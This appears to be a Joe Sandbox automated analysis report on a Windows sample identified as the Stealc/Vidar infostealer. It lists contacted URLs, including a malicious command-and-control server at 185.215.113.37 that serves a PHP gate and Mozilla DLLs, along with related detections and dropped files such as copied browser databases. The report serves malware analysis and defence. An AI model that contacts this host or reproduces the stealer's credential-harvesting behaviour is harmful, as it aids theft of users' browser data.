http://185.215.113.37/0d60be0de163924d/mozglue.dllK	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpBzi	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpo	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	IEHDBGDHDAECBGDHJKFI.0.dr	false		unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll%	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phps	file.exe, 00000000.00000002.1937269330.0000000001764000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpz	file.exe, 00000000.00000002.1937269330.0000000001764000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php6o	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dlla	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpser	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dllE~4	file.exe, 00000000.00000002.1937269330.0000000001777000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000002.1952414241.0000000029C63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp, IEHDBGDHDAECBGDHJKFI.0.dr	false		unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.1947879466.000000001DCCD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1955477368.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpdllsi	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, 00000000.00000002.1955906746.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dllO	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	file.exe, 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	file.exe, 00000000.00000002.1952414241.0000000029C63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp, IEHDBGDHDAECBGDHJKFI.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpoei	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.php;i	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	file.exe, 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpW	file.exe, 00000000.00000002.1937269330.0000000001764000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.1952414241.0000000029C63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp, IEHDBGDHDAECBGDHJKFI.0.dr	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, file.exe, 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1795281516.000000001DBCC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t	file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpHi	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	BGIJJKKJJDAAAAAKFHJJDGDAFB.0.dr	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpfAi	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1952414241.0000000029C63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp, IEHDBGDHDAECBGDHJKFI.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpnomi	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpFirefox	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.mozilla.org	BGIJJKKJJDAAAAAKFHJJDGDAFB.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dllY	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1541753
Start date and time:	2024-10-25 05:20:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/22@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 74 Number of non-executed functions: 49
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	fXg8zgxVTF.exe	Get hash	malicious	Stealc, Vidar	Browse
	T220UXIoKO.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AAAKEBGDAFHIIDHIIECFBKFIJK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BGIJJKKJJDAAAAAKFHJJDGDAFB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBGIJEHIIDGCFHIEGDGCBFHDBA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIDHCAAKECGCBFIJDB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDBFCGII

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HJJKJJDHCGCAECAAECFH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IECFBKFH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IEHDBGDHDAECBGDHJKFI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: fXg8zgxVTF.exe, Detection: malicious, Browse Filename: T220UXIoKO.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
